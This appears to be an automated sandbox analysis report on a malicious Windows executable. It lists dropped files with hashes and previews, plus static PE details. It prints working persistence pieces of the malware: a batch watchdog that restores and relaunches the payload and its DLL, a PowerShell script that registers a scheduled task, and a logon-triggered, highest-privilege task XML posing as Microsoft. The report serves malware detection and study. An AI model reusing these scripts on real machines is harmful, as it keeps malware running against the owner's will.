                                                                Preview:..>.....x...@..(.....*.......B..........p..[....y...r...:**<5..F..?...S.......+lF.i.....c[K...P|.......]-L.Y..t.A8:..j.9#.U.+..O.;..{.g..P.......|@}gP....h~./~..\..P.....I.i...L./\?.kE...o"z.9..6........*.`.........../;.'Z......S.MM...a..-..l?H*...:bZ..G'.~..V.....hc...3....q..J.........<Wvj~>*t..M...3...L..D..u^..=P.....l.1..4..[.ds<D.s..k.cd..~b-.66'..Ae.Dh.S&...|..$......p;..p.~ni..T...6q7...Z.T....c.^b<... X.|.2f...!..~M..g...L=.~.Z.<[........N....c...iD...e.).g|.CA.{.S..%.uz}..M-. s.]....W.../?.k.....b..................fLR<+n..<.r'.W.i..j..%.F/^.1Q.-...X..V(S.....3...[}4....HG.{.....].@..0S._KA...oS<'.U<0..gLSD7...Q.A>9..A].O1.r:..|....`.....E..+,...5x...?.J......Z..).Z..{...u...fN.d..t)u..[..d.0 .of.q.4I..Fx..!1.v...oF9g.....{zP..`..%.......g5....h.....U=;M.ce.CW..G;'....=.cMC.i.Q..(.sD+k....@\H.....S.Ln.ym(c..d.+Q)v..H.;..G...]. ..A.oZ.-(....zecA..V0...X......I..Y..R...L"..*2.D.{.8..`.g..^.........9c'....n:QvO.........$..4...>..

                                                                C:\Users\Public\Bilite\linit-v4.1.6.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1028256
                                                                Entropy (8bit):5.41129017115742
                                                                Encrypted:false
                                                                SSDEEP:12288:gwrY4IECJHENxLp5S/rZn0YzNTNuF3/C/JDeS8mJhcVBNtg62KFPr:g8NqqUNTNuFvOh8mJw3662Aj
                                                                MD5:587E3BC21EFAF428C87331DECC9BFEB3
                                                                SHA1:A5B8EBEAB4E3968673A61A95350B7F0BF60D7459
                                                                SHA-256:B931C5686CC09B2183BBA197DC151B8E95CA6151E39FB98954352340C0B31120
                                                                SHA-512:FFAE2DAB5CAF16DC7DFD0A97A8FF6349A466BC57EE043D1AC4D53E011498E39B9A855295D10207BA578C6857ABEBD445D378E83AA2FF6EC247713D81B370D0CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.[.~.5.~.5.~.5..[6.p.5..[0...5..[1.g.5.1.1.o.5.1.6.i.5.1.0.!.5...0.}.5..[4.a.5.~.4.M.5...<.s.5......5.~....5...7...5.Rich~.5.........................PE..L......f...............".....p.......z............@.................................L.....@.................................pp..........Hd...........^...R...P...N......p...................@...........@............................................text............................... ..`.rdata..`x.......z..................@..@.data....=.......(...~..............@....fptable............................@....rsrc...Hd.......f..................@..@.reloc...N...P...P..................@..B........................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1360
                                                                Entropy (8bit):5.405051374611953
                                                                Encrypted:false
                                                                SSDEEP:24:3eWSKco4KmZjKbmOIKod6emN1s4RPQoU99tXt/NK3R88bJ02iaEW3b5:uWSU4xympjms4RIoU99tlNWR832qab5
                                                                MD5:86DFAF94EFE31AC1960C77DDE14BB8A1
                                                                SHA1:89C9EC7BA3BAD4A8B8BD8556D41FE54664D83C71
                                                                SHA-256:9FE97B3EBF5C883DE01F0D59E47AD0ECE788D0FE6B9745F8B1E53974960C3F61
                                                                SHA-512:C7F5BE1F3DBAEEF2987239A1947697C4CE65127F233294D2DF259862C1F64EE85B38296CAB4C19605BA24D18514C02F501BDC8C637A0E5ED19692056480E93A7
                                                                Malicious:false
                                                                Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                Download File
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1893
                                                                Entropy (8bit):5.212287775015203
                                                                Encrypted:false
                                                                SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ebhpwij.g4q.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gomdx00.kum.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_av2a0w1v.yay.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3depvoj.sct.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mss1eofc.scj.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqxhaft1.dgi.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_priipfuq.qy1.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xazchrmt.lso.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\backup.dll

                                                                Download File
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2290456
                                                                Entropy (8bit):6.607149462612304
                                                                Encrypted:false
                                                                SSDEEP:49152:hyT6UzfP7fyC5fJVOWsL6FpGgxv4v9c2Ut3n1gp0pci3YKLjX:hK6UzfP73RVOWmMZxvwc2Ut3n6p0pciV
                                                                MD5:4A55B0873DAD6B4F9506589C6B341D4E
                                                                SHA1:5231E7DF7BE7C3B1C145BDF2BC8E5E23C8540898
                                                                SHA-256:DFBD06B0B2C121153B0DE4B809778CEA1A43E754E6D18B254BA8902902850CF4
                                                                SHA-512:297F0A3F2442A2C70BF5828C0C60B228D043F2BF80D9305FF6F2AE15328040F7B5634D36529E0CAC53E90F084208A630B2C8E8C0C5C70B4E9A130B8FB3895C0D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....cg...........!.........<......S .......................................`#...........@.................................3...h..... ..H............"..)... !..0.......................... b......p................................................text...}........................... ..`.rdata...^.......`..................@..@.data......... ..^..................@....00cfg........ ......L .............@..@.tls.......... ......N .............@....rsrc....H.... ..H...P .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\backup.exe

                                                                Download File
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):315264
                                                                Entropy (8bit):6.663282350107098
                                                                Encrypted:false
                                                                SSDEEP:6144:rcaBfTrqYPy8brrIQYDW6AgoY7fJA3p+anDhDAOHlPzJD:rca48brrIQYDW6AgpAzjzJD
                                                                MD5:607336E586D1BD00DCF1CA7EED97A8DB
                                                                SHA1:1B10CCE801F12E277DEFD9D16FC3F4EEBCCE3344
                                                                SHA-256:A5DD0996B950D443A04F8589EAF7AEA16C9420D9B72D336F283F95DC74BFC79C
                                                                SHA-512:61A81D218090BDFAAADB6AA87C407984FDA14C62D98397817D9AAD1A0350E7C4E0A7FD884D71081EB15044CF0D06C1B9715C822DC50831A03D63EF66AEB2BEFA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........>.'._.t._.t._.t.4.u._.t.4.ug_.t.4.u._.t.*.u._.t.*.u._.t.*.u._.t.'ct._.t...u._.t.4.u._.t._.ti_.t.*.u._.t.*.t._.t._gt._.t.*.u._.tRich._.t........................PE..L....*.f..........................................@......................................@.............................................h............~...Q......D*......p...............................@............................................text............................... ..`.rdata..`...........................@..@.data...PF...0...6..................@....rsrc...h............L..............@..@.reloc..D*.......,...R..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\monitor.bat

                                                                Download File
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):814
                                                                Entropy (8bit):5.142435259685461
                                                                Encrypted:false
                                                                SSDEEP:24:NFW/WRW/WRWE3fzWcEbTCrfZKx31SIYaYZLZ6y:NFVRVRjvzmbTUZKx31SIYN/6y
                                                                MD5:AAB6A4CDD3F731F7EC6C98C2C6098787
                                                                SHA1:433BE51346E6A2A199B535BBC36CE252A61E34EB
                                                                SHA-256:EDEF7DA4A25E1EAEC7247ED23EED56D6ADA8518AA69C519AEEBE89131C7B52B4
                                                                SHA-512:67B20D585D59BFF57A84E467A9CF31D68FEA48C33592916822939189CC9F400D1378FBC311D9244371D9AB7F5BAA08EFC8D3B8682E22E7530B74F6C340364110
                                                                Malicious:false
                                                                Preview:@echo off..:CheckProcess..set "ProcessName=kwpswnsserver.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..

                                                                C:\Users\user\AppData\Local\Temp\monitor.pid

                                                                Download File
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):1.5
                                                                Encrypted:false
                                                                SSDEEP:3:E:E
                                                                MD5:0C9E63B6CEC0627182663AE8FEB204CB
                                                                SHA1:3C251B930164EDBACA3519A07BE74218D40C5FC1
                                                                SHA-256:423E0328917025753AB3A5EBE7F7E85BAA34BC80A9E309CF2341F93756C387EF
                                                                SHA-512:1F203323637B6478AB2E1DEF2259AAA2B20EC19270182C59CBF7A31CDB852E7C9954BDA8EF9ABB417F03673774DC218E9506A8C1EA7EBA32F02C4F44F64FE13B
                                                                Malicious:false
                                                                Preview:8168

                                                                C:\Users\user\AppData\Local\updated.ps1

                                                                Download File
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):151
                                                                Entropy (8bit):4.741657013789009
                                                                Encrypted:false
                                                                SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                Malicious:true
                                                                Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                C:\Users\user\Desktop\linit-v4.1.6.exe.lnk

                                                                Download File
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 27 11:09:07 2024, mtime=Fri Dec 27 11:09:07 2024, atime=Wed Nov 20 11:08:04 2024, length=1028256, window=hide
                                                                Category:dropped
                                                                Size (bytes):1061
                                                                Entropy (8bit):4.696775278947634
                                                                Encrypted:false
                                                                SSDEEP:12:8z+UrrC9RUlGIQgCICHqXYX/XMACmqIBGhSCg0zKxHS/xIiljAQtFkGAavExo449:8zfGFU+NTiKxczRAkve3qyFm
                                                                MD5:CBF65092DB5D1D066EC001BC7F7E9865
                                                                SHA1:749CA294D442EA245971977C72902285F8C506EA
                                                                SHA-256:A6EC2688B31AA2443AA361F403E95F4B0597BFE9E68C7C562C63C4947468306A
                                                                SHA-512:2FBBC4911FA862480998EE80C81F33CB19F45A50574EB864BD0E4E39FC011147C69C90C8F13DC8701982177D3851E912CE81C36B0D27492690CEB1B6D11E000A
                                                                Malicious:false
                                                                Preview:L..................F.... ....:[!XX..+.]!XX...G..D;...............................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.Y!a....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Y"a..Public..f......O.I.Y%a....+...............<.........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......Y$a..Bilite..>......Y"a.Y$a..........................UO%.B.i.l.i.t.e.....n.2.....tY.a .LINIT-~1.EXE..R......Y$a.Y$a.....+........................l.i.n.i.t.-.v.4...1...6...e.x.e.......V...............-.......U..............d.....C:\Users\Public\Bilite\linit-v4.1.6.exe..$.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.l.i.n.i.t.-.v.4...1...6...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......642294...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...

                                                                \Device\Null

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\timeout.exe
                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                Category:dropped
                                                                Size (bytes):130
                                                                Entropy (8bit):4.10355589898397
                                                                Encrypted:false
                                                                SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2V:hYFRamFSQZ0lv5y/9JctESnQUql
                                                                MD5:B5228F46DF07DAF9DC514A2DC07078F3
                                                                SHA1:428D65EA0BA173ED7C2196C81CE993F94342419F
                                                                SHA-256:56D5B811DC01639CBD4530CD830F7CCD99FE1DF3B4FFD78F1FBB53AAA778B2E0
                                                                SHA-512:F67D29C9497E591EA93CED65EE45EA9A75D7F89D956CEBC2D995834BB5503AE91A9B3B716C19F66696292FE54AF70E7C6495C60599C66554CF76CBCA115AD2A4
                                                                Malicious:false
                                                                Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.99996315828415
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:OdiHmn3pRK.exe
                                                                File size:36'618'436 bytes
                                                                MD5:11933d4b44331258739282e769ca4914
                                                                SHA1:dbd80d352bb11812af26421bd0668d2913e93eac
                                                                SHA256:ed319509508b44b3dd2a50c735c11c2bb7d29b753435b28ab40e3d08d376e46a
                                                                SHA512:b4c0f32e59f403b011842c7df7fa390441067fc3257d272707d8f74b09e943c53646211d64af5b8cdf678b970c00f9e47d4affe70b360145612c2c357ad81fc6
                                                                SSDEEP:786432:BuvQnP5UsAxHV0/+LGoxUxz/IWBN+UpdwuCLRchZ7iiH8E4Jfc+p6:EqP5GHV0/4TWBN+IdULRS+iH8E6C
                                                                TLSH:1087335F3694F3FFC2EBDAF99415F18EE53B6A2E116249256B41C2013F6430A8CC63A5
                                                                File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................N...............0....@..........................................................................P...........................).

                                                                File Icon

                                                                Icon Hash:878fd7f3b9353593

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x411def
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:
                                                                Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:b5a014d7eeb4c2042897567e1288a095

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 18/07/2022 01:00:00 18/07/2024 00:59:59
                                                                Subject Chain
                                                                • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                                                Version:3
                                                                Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                                                Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                                                Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                                                Serial:7098774ED29B0565AB114EF2F2871CF7

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                push FFFFFFFFh
                                                                push 00414C50h
                                                                push 00411F80h
                                                                mov eax, dword ptr fs:[00000000h]
                                                                push eax
                                                                mov dword ptr fs:[00000000h], esp
                                                                sub esp, 68h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                mov dword ptr [ebp-18h], esp
                                                                xor ebx, ebx
                                                                mov dword ptr [ebp-04h], ebx
                                                                push 00000002h
                                                                call dword ptr [00413184h]
                                                                pop ecx
                                                                or dword ptr [00419924h], FFFFFFFFh
                                                                or dword ptr [00419928h], FFFFFFFFh
                                                                call dword ptr [00413188h]
                                                                mov ecx, dword ptr [0041791Ch]
                                                                mov dword ptr [eax], ecx
                                                                call dword ptr [0041318Ch]
                                                                mov ecx, dword ptr [00417918h]
                                                                mov dword ptr [eax], ecx
                                                                mov eax, dword ptr [00413190h]
                                                                mov eax, dword ptr [eax]
                                                                mov dword ptr [00419920h], eax
                                                                call 00007F6969132F42h
                                                                cmp dword ptr [00417710h], ebx
                                                                jne 00007F6969132E2Eh
                                                                push 00411F78h
                                                                call dword ptr [00413194h]
                                                                pop ecx
                                                                call 00007F6969132F14h
                                                                push 00417048h
                                                                push 00417044h
                                                                call 00007F6969132EFFh
                                                                mov eax, dword ptr [00417914h]
                                                                mov dword ptr [ebp-6Ch], eax
                                                                lea eax, dword ptr [ebp-6Ch]
                                                                push eax
                                                                push dword ptr [00417910h]
                                                                lea eax, dword ptr [ebp-64h]
                                                                push eax
                                                                lea eax, dword ptr [ebp-70h]
                                                                push eax
                                                                lea eax, dword ptr [ebp-60h]
                                                                push eax
                                                                call dword ptr [0041319Ch]
                                                                push 00417040h
                                                                push 00417000h
                                                                call 00007F6969132ECCh

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x13c0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x22e97ac0x2918
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
